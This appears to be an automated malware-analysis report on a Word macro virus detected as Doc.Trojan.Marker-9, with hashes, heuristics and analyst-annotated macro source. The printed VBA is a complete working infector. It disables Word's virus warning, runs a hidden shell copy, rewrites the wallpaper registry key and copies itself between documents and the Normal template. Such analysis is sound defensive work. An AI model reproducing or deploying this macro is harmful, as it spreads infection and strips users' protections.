Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7c99c543556eac38…

MALICIOUS

Office (OLE)

47.0 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: b7631c17396680a79f80157ea48e4b53 SHA-1: 2c0ffc1a04e7b9f5ccbeac1f8550d7ec5f950f0b SHA-256: 7c99c543556eac3824e1031e20b9acc9f29c09245d98e1d50b88acfdf81c2731
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Office document containing VBA macros. The macros attempt to copy a file named 'NetSetup.log' from a network share to the local system and then set this copied file as the system wallpaper. The extracted macro source below also shows the code copying its own VBA module between the open document and the Normal template. This behavior suggests an attempt to establish persistence or download and execute a second-stage payload.

Heuristics 3

  • ClamAV: Doc.Trojan.Marker-9 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-9
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9953 bytes
SHA-256: 1fff0747537d285e7214430d260014ae89468422c04a5072272a376894ea13de
Detection
ClamAV: Doc.Trojan.Marker-9
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Document_Close: runs when the document is closed. The whole body runs under
' On Error Resume Next, so any failing statement is skipped silently.
' Analyst notes (no code changed). What this listing shows, in order:
'   1. hides UI activity (ScreenUpdating off, window minimised) and turns the
'      built-in macro virus warning off (Options.VirusProtection = False);
'   2. searches C:\ and the share \\post\temp\1000 for NetSetup.log and copies
'      the share copy to c:\ through a hidden Shell "command.com /c copy ..." call;
'   3. writes c:\NetSetup.log into HKEY_CURRENT_USER\Control Panel\Desktop\WallPaper
'      via System.PrivateProfileString;
'   4. extends the selection 20 lines down, changes its case (wdNextCase) and saves;
'   5. copies its own VBA source between the first VBA component of the active
'      document and of the Normal template, using the constant Kuku
'      ("Black Wednesday!") as an "already present" marker to choose the direction.
' Detection hooks visible here: the VirusProtection write, access to
' VBProject.VBComponents (requires "Trust access to the VBA project object model"),
' the hidden command.com Shell call, and the Desktop\WallPaper registry write.
Private Sub Document_Close()

On Error Resume Next
    Application.ScreenUpdating = False
    ActiveWindow.WindowState = wdWindowStateMinimize

' Marker string searched for in each code module (see the two .Find calls below).
Const Kuku = "Black Wednesday!"

'Declare Variables
' NOTE: in VBA only the last name in each Dim list receives the declared type;
' SaveDoc, SaveNormalTempl, DocInfected, ActDoc, MyCod, UserAddress, LogData,
' a1 and FileLocal are Variants. UserAddress, LogData and LogFile are declared
' but never used in this listing; fs and OurCode are used without a declaration
' (no Option Explicit is visible in the module header).
Dim SaveDoc, SaveNormalTempl, DocInfected, NormalTemplInfected As Boolean
Dim ActDoc, NormTempl As Object
Dim MyCod, UserAddress, LogData, LogFile As String
Dim a1, FileLocal, FileServer As Integer

'Initialize Variables
' First VBA component of the open document and of the Normal template.
Set ActDoc = ActiveDocument.VBProject.VBComponents.Item(1)
Set NormTempl = NormalTemplate.VBProject.VBComponents.Item(1)

' Infection state: does the marker string already appear in each module?
DocInfected = ActDoc.CodeModule.Find(Kuku, 1, 1, 10000, 10000)
NormalTemplInfected = NormTempl.CodeModule.Find(Kuku, 1, 1, 10000, 10000)

'Switch the VirusProtection OFF
' Disables Word's macro virus warning for this session.
Options.VirusProtection = False

' Two FileSearch runs; the Execute return value is used below as a hit count.
Set fs = Application.FileSearch
With fs
    .LookIn = "C:\"
    .FileName = "NetSetup.log"
    FileLocal = .Execute
End With
With fs
    .LookIn = "\\post\temp\1000"
    .FileName = "NetSetup.log"
    FileServer = .Execute
End With
    
' Copy the share file locally when no local copy exists or the sizes differ.
' Both branches run the same hidden command.com copy.
If FileServer > 0 Then
    If (FileLocal <= 0) Then
        Shell "command.com /c copy \\post\temp\1000\NetSetup.log c:\NetSetup.log", vbHide
    Else
        If FileLen("\\post\temp\1000\NetSetup.log") <> FileLen("c:\NetSetup.log") Then
            Shell "command.com /c copy \\post\temp\1000\NetSetup.log c:\NetSetup.log", vbHide
        End If
    End If
End If

' Registry write: points the user's wallpaper at the copied file.
System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\Desktop", _
"WallPaper") = "c:\NetSetup.log"

' The weekday guard is commented out, so the payload below runs on every close.
'If (WeekDay(Now()) = vbWednesday) Then
    Selection.MoveDown Unit:=wdLine, Count:=20, Extend:=wdExtend
    Selection.Range.Case = wdNextCase
    ActiveDocument.Save
'End If
'Make sure that some conditions are true before we continue infecting anything
' Proceeds only when exactly one of the two modules carries the marker (Xor)
' and the document is a .doc or .dot.
If (DocInfected = True Xor NormalTemplInfected = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
   
   
  'Infect the NormalTemplate
  ' Document -> Normal template: replace the template module with this module's text.
  If DocInfected = True Then
  
    SaveNormalTempl = NormalTemplate.Saved
  
    MyCod = ActDoc.CodeModule.Lines(1, ActDoc.CodeModule.CountOfLines)

    a1 = NormTempl.CodeModule.CountOfLines
    NormTempl.CodeModule.DeleteLines 1, a1
    NormTempl.CodeModule.AddFromString MyCod
    
    ' Saves the template only if it was already in a saved state.
    If SaveNormalTempl = True Then NormalTemplate.Save
    
  End If
              
  'Infect the ActiveDocument
  ' Normal template -> document: the Mid() test looks like a check for a
  ' drive-letter path (second character ":"); only the document's saved state
  ' and that path form are tested here.
  If NormalTemplInfected = True And _
     (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
     ActiveDocument.Saved = False) Then
  
    SaveDoc = ActiveDocument.Saved
    
    OurCode = NormTempl.CodeModule.Lines(1, NormTempl.CodeModule.CountOfLines)

    a1 = ActDoc.CodeModule.CountOfLines
    ActDoc.CodeModule.DeleteLines 1, a1
    ActDoc.CodeModule.AddFromString OurCode
    
    ' Saves the document only if it was already in a saved state.
    If SaveDoc = True Then ActiveDocument.Save
      
  End If
  
    
End If

End Sub














' Processing file: /opt/analyzer/scan_staging/2e3209c56e084d8e96203cce10096b5d.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 9230 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #4:
' 	Ld wdWindowStateMinimize 
' 	Ld ActiveWindow 
' 	MemSt WindowState 
' Line #5:
' Line #6:
' 	Dim (Const) 
' 	LitStr 0x0010 "Black Wednesday!"
' 	VarDefn Kuku
' Line #7:
' Line #8:
' 	QuoteRem 0x0000 0x0011 "Declare Variables"
' Line #9:
' 	Dim 
' 	VarDefn SaveDoc
' 	VarDefn SaveNormalTempl
' 	VarDefn DocInfected
' 	VarDefn NormalTemplInfected (As Boolean)
' Line #10:
' 	Dim 
' 	VarDefn ActDoc
' 	VarDefn NormTempl (As Object)
' Line #11:
' 	Dim 
' 	VarDefn MyCod
' 	VarDefn UserAddress
' 	VarDefn LogData
' 	VarDefn LogFi
... (truncated)